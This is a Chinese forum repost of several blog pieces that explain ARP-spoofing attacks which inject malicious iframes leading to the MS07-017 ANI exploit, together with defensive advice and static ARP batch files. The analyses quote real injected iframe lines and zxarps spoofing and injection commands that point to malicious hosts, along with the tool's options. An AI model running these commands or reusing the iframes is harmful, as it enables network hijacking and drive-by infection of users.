飽受ARP攻擊和掛馬網頁自動下載木馬之苦的朋友們進來看
“木馬猛於虎也”,這句話用在現在的網民(包括我這樣的老菜鳥)身上真是再貼切不過了,經常發現有程序會自動下載病毒和木馬程序,卻無可奈何,或者經常遇到ARP攻擊也束手無策。不過最近在瀏覽金山毒霸工作人員鐵軍的博客時候卻有了可喜發現,好東西要分享給大家o(∩_∩)o…,請大家看下面的內容,有些長,但是絕對有效,看完了別忘了頂帖哦o(∩_∩)o
下面的內容是在金山毒霸的鐵軍的blog裏面摘抄的,對ARP病毒攻擊和Risk.exploit.ani病毒的處理給了很好的解決建議,我轉載出來大家參考下:
最近用戶諮詢Risk.exploit.ani病毒的問題比較多,該病毒是利用微軟MS07-017中的動態光標處理漏洞的畸形ANI文件, 被某些已經掛載木馬的網頁自動下載。當用戶的瀏覽器打開帶有相關惡意代碼的網頁,將畸形ANI文件下載到本機臨時文件夾中時,這時,毒霸的實時防毒和網頁監控會進行報警,由於該文件被IE佔用,所以某些情況下毒霸是無法立即刪除的。但是毒霸已經專門針對此病毒進行了免疫處理,用戶即時沒有安裝相關漏洞補丁,只要啓用毒霸監控,也不會中毒。並且,針對這些文件,毒霸還進行了延遲刪除處理,在下次重啓系統時,這些被鎖定的文件會被自動,下載的畸形ANI文件將不起作用,也就不會通過ANI漏洞去下載真正的病毒木馬了。
有兩種情況,需要注意:
1.對於病毒本身而言,清除是簡單的,關閉瀏覽器,然後清空IE臨時文件夾,補丁編號MS07-017 KB912919,詳細情況見http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx ,如果是本機感染病毒,可以根據日誌提取樣本。
2.局域網其他計算機感染病毒進行會話劫持攻擊,最近的諮詢也比較多,上面的處理方法就無效了。因爲病毒本來不一定在當前這臺客戶機上。某些病毒或者木馬利用ARP欺騙等手段,在用戶收到的網絡數據包中自動插入i-frame-X代碼,代碼指向利用MS07-017漏洞的網址。使得中毒用戶,以及局域網中受到此中毒電腦的欺騙攻擊的用戶,在上任意網站的時候都會提示存在該病毒。通俗點說,就是局域網某個計算機感染病毒或者木馬,該病毒發送arp欺騙,然後在所有的網頁訪問的tcp數據中插入一段i-frame-X代碼,只要網內的計算機通過網關上網,所有的網頁都會跳轉到i-frame-X制定的網頁,該網頁是存在畸形ANI文件,所以毒霸會不斷的報警。顯示的Risk.exploit.ani只不過是一種表現,就像木馬下載器和木馬,其原理和功能有天壤之別。對於該類情況,也比較容易判斷,如果是局域網用戶,一般其他的電腦也存在該問題,而且是訪問任意網站都會存在該提示。由於不是本機感染病毒,所有對該計算機進行殺毒,掃描提取樣本可能都是無效的。用戶需要找到的是發送arp欺騙,從而導致出現該現象的機器,這個需要網管抓包來分析,用戶個人是無法完成的。當然無論如何,首要解決的是安裝補丁。而對於第二種情況,也就是現在局域網中感染ARP 病毒的情況,由於此種現象目前非常普遍,清理和防範都比較困難,給不少的網絡管理員造成了很多的困擾。下面就是處理這個病毒的一些參考方法,供大家參考:
ARP 病毒的症狀:
有時候無法正常上網,有時候有好了,包括訪問網上鄰居也是如此,拷貝文件無法完成,出現錯誤;局域網內的ARP 包爆增,使用Arp 查詢的時候會發現不正常的Mac 地址,或者是錯誤的Mac 地址對應,還有就是一個Mac 地址對應多個IP 的情況也會有出現。
ARP 攻擊的原理:
ARP 欺騙攻擊的包一般有以下兩個特點,滿足之一可視爲攻擊包報警:第一以太網數據包頭的源地址、目標地址和ARP 數據包的協議地址不匹配。或者,ARP數據包的發送和目標地址不在自己網絡網卡MAC 數據庫內,或者與自己網絡MAC 數據庫MAC/IP 不匹配。這些統統第一時間報警,查這些數據包(以太網數據包)的源地址(也有可能僞造),就大致知道那臺機器在發起攻擊了。現在有網絡管理工具比如網絡執法官、P2P 終結者也會使用同樣的方式來僞裝成網關,欺騙客戶端對網關的訪問,也就是會獲取發到網關的流量,從而實現網絡流量管理和網絡監控等功能,同時也會對網絡管理帶來潛在的危害,就是可以很容易的獲取用戶的密碼等相關信息。
處理辦法:
通用的處理流程:
1 .先保證網絡正常運行
方法一:編輯個***.bat 文件內容如下:
arp.exe s
**.**.**.**(網關ip) ****
**
**
**
**(
網關mac 地址)
end
讓網絡用戶點擊就可以了!
辦法二:編輯一個註冊表問題,鍵值如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"mac"="arp s
網關IP 地址網關Mac 地址"
然後保存成Reg 文件以後在每個客戶端上點擊導入註冊表。
2 找到感染ARP 病毒的機器。
a:在電腦上ping 一下網關的IP 地址,然後使用ARP -a 的命令看得到的網關對應的MAC 地址是否與實際情況相符,如不符,可去查找與該MAC 地址對應的電腦。
b:使用抓包工具,分析所得到的ARP 數據報。有些ARP 病毒是會把通往網關的路徑指向自己,有些是發出虛假ARP 迴應包來混淆網絡通信。第一種處理比較容易,第二種處理比較困難,如果殺毒軟件不能正確識別病毒的話,往往需要手工查找感染病毒的電腦和手工處理病毒,比較困難。
c:使用mac 地址掃描工具,nbtscan 掃描全網段IP 地址和MAC 地址對應表,有助於判斷感染ARP 病毒對應MAC 地址和IP 地址。
預防措施:
1,及時升級客戶端的操作系統和應用程式補丁;
2,安裝和更新殺毒軟件。
4,如果網絡規模較少,儘量使用手動指定IP 設置,而不是使用DHCP 來分配IP 地址。
5,如果交換機支持,在交換機上綁定MAC 地址與IP 地址。(不過這個實在不是好主意)
還有,使用金山毒霸的朋友要升級病毒庫,可以很好的進行防範;此外也可以下載金山專殺工具,進行病毒的掃描查殺,效果也不錯,最主要的工具是免費的,呵呵。可以來這裏下載相應的工具:http://www.duba.net/default.shtml
Ps:我不是金山的槍手,但是我願意去做金山毒霸的宣傳者,金山毒霸其實一直在真正爲用戶着想,去努力,這種精神和態度是值得肯定的。至少看他們的文章和博客還是很讓我感動的,呵呵
------------------------------------------------------------------------------------------------
服務器被ARP攻擊,網站被掛馬
今天凌晨一打開自己的網站,卡巴就彈出來說有病毒,報告爲“惡意程序 Exploit.Win32.IMG-ANI.k 文件: F:/Documents and Settings/*****/Local Settings/Temporary Internet Files/Content.IE5/DF7VHPOE/love[1].jpg”,然後網頁顯示的也有問題,最上方居然裸露出來了一小段源碼,於是馬上查看源碼,發現代碼居然被改了。
最上面變成了:
<iframe src='httP://web.21575.com/113/' height=0 width=150></iframe>
我的第一反應就是網站被人掛馬了,首先想到的是不是程序有漏洞,被人傳了木馬,趕緊用FTP連上,檢查ASP文件,發現所有的ASP文件都沒有是今天修改過的,模板系統也沒有問題,這下我真的不知道怎麼辦了。都搞不清楚問題出在哪裏。。。。
然後我對掛馬的這個網站來了興趣,在百度裏一搜“21575”,
http://www.baidu.com/s?word=domain:21575&ie=gb2312&ct=0
發現有一條的結果的標題是“服務器被ARP欺騙,大家請不要訪問我的站”,看了一下那條帖子,然後又聯想到昨天下午收到了IDC的短信,提醒說最近ARP病毒氾濫,於是我馬上就想到應該是受到ARP攻擊了。
下午我還去IDC的網站上看了一下,有一篇關於防範ARP攻擊的公告,還提供了ARP防範工具下載,趕緊下了,然後安裝。
這個軟件是ARP防火牆(Anti ARP Sniffer),下載地址:http://www.antiarp.com/newsopen2.asp?ArticleID=24
剛裝上以後ARP防火牆啓動不了,於是重啓服務器,順利啓動了,然後就看到ARP防火牆提示受到ARP攻擊了,還能跟蹤到攻擊的來源IP。
裝上ARP防火牆以後,再訪問網站,一切正常。
MUD,看來ARP攻擊纔是最高明的攻擊方法嘛,MUD!
ARP攻擊的先進性就好比DNS劫持一樣,處於最上層。網頁實際的文件並沒有改變,但是發送給瀏覽器以後就變了樣了,被病毒給改了。
相關知識:
ARP即Address Resolution Protocol,將網絡IP地址映射至網卡硬件MAC地址的協議。一般危害爲欺騙同網段內的其他服務器地址,截獲其數據報文、監聽數據傳輸、盜取帳號信息,甚至對來訪數據包進行欺騙和僞造。該病毒發作方式爲:網段內一臺服務器中此病毒,病毒將以此機器作爲肉雞,對同網段服務器進行數據劫持和欺騙。類似於奪取同段內的其他服務器的IP,導致合法服務器無法正常通訊。此病毒還可對網關地址進行欺騙,造成此網段所有IP地址都無法正常解析。以致網絡大面積癱瘓。
我這次的情形就是上面說的“對來訪數據包進行欺騙和僞造”、“對同網段服務器進行數據劫持和欺騙”,ARP防火牆查到了攻擊源,是同網段內的一臺機子,我看了一下那臺機子,居然是用IIS的默認站點建的站(可以直接用IP訪問),估計系統漏洞不少,被人攻擊中毒了,然後連累到我們同網段內的其他無辜的用戶。
安全很重要!尤其是在最近病毒木馬氾濫的日子裏。
------------------------------------------------------------------------------------------------
ARP攻擊,惡意代碼寫入網絡數據包
之前我們發表過一篇日誌小心惡意網址a.d3a.us,今天上午發佈了其中病毒的解決方案,下午的時候我們發現在這個病毒下載的其它惡意程序裏有使用ARP欺騙方式“掛馬”的惡意程序。
利用的工具是zxarps,Build 01/17/2007 By LZX(還挺新的,要儘早扼制才行)。病毒一邊不斷地清ARP表(arp.exe -d),一邊向指定IP段指定端口發送攻擊命令:
zxarps -idx 0 -ip xxx.xxx.xxx.xxx-xxx.xxx.xxx.xxx -reset
zxarps -idx 0 -ip xxx.xxx.xxx.xxx-xxx.xxx.xxx.xxx -port 80 -insert "<iframe src=http://a.d3a.us/1/ width=0 height=0 frameborder="0"></iframe>"
欺騙指定IP段內的客戶端,插入惡意代碼到數據包中,然後返回給被欺騙客戶端,客戶端瀏覽網頁時感覺就像網站被掛馬一樣。如果被這ARP欺騙攻擊導致局域網內多臺機器都中了這個東西,想象這個局域網會亂到什麼程度,清除起來也不會很方便了吧。
附一點說明:
引用
-idx [index] 網卡索引號
-ip [ip] 欺騙的IP,用'-'指定範圍,','隔開
-port [port] 關注的端口,用'-'指定範圍,','隔開,沒指定默認關注所有端口
-reset 恢復目標機的ARP表
-insert [html code] 指定要插入html代碼
“掛馬”的方式方法越來越多,繼修改網頁文件流行後,這種“ARP掛馬”也躍躍欲試,局域網啊!
而且而且,現在的病毒和木馬羣分工越發明確,比如某郵件蠕蟲,附在郵件附件裏的是downloader,down下來的有專門負責發送郵件的、有專門負責收集地址的、有專門檢查自己更新的、還有專門進行DDoS的;木馬羣也是這樣,一個惡意網站down一個木馬,它再down一堆其它木馬,有盜Q的、有盜網遊的、有專門髮尾巴的,還有專殺反病毒軟件清道的,還有還有……專門負責廣告推廣的!唉,互聯網啊!
------------------------------------------------------------------------------------------------
又見 ARP 攻擊會話劫持掛馬的黑客程序
病毒詳細信息
病毒全名 Win32.Hack.ArpSpoon.h
病毒長度 26112
威脅級別 ★★
病毒類型 黑客程序
病毒簡介
這是一個ARP欺騙病毒,它能向同網段所有計算機發送ARP欺騙數據包,挾持了該網段內的網關,使經過網關的每個數據包都經過受病毒感染的計算機,該計算機會尋找HTTP響應包,在包內加入掛馬的代碼。
技術細節
1、ARP欺騙
病毒會枚舉本計算機所在的網段,併發送經過僞造的ARP(Address Resolution Protocol)數據包,挾持了本網段的網關地址,使本網段的所有的數據包都經過該計算機。
2、修改特定數據包
病毒會對所有的數據包進行分析,過濾出HTTP應答包,並在包裏面插入一段代碼,使用戶看到的網頁最前面被插入以上代碼,該網頁會利用ANI漏洞(MS07-017)下載並運行木馬程序,建議用戶及時補上計算機上已知的漏洞。
注:
利用ARP欺騙掛木馬並沒有真正的修改網頁服務器上的頁面內容,它是在數據包傳輸中非法修改裏面的數據,強行插入病毒代碼,而且影響範圍相當的廣,若一個空間服務商的一臺服務器中毒,就會使得該服務器所在的網段的傳輸的數據包都被修改,很可能會影響到數以百計的網站空間。而且尋找ARP欺騙的源頭並不容易查出,所以這種攻擊方式具有極大的危害性。建議網絡管理員使用靜態的路由表來管理網絡的MAC與IP地址。
------------------------------------------------------------------------------------------------
現在知道了解決辦法:
設置靜態網關和局域網內機器的IP及MAC地址綁定,我做了一個Bat文件,如下:
Anti-ARP.bat
arp -d
arp -s 192.168.0.1 00-01-02-03-04-35
arp -s 192.168.0.2 00-11-0a-11-23-45
arp -a
pause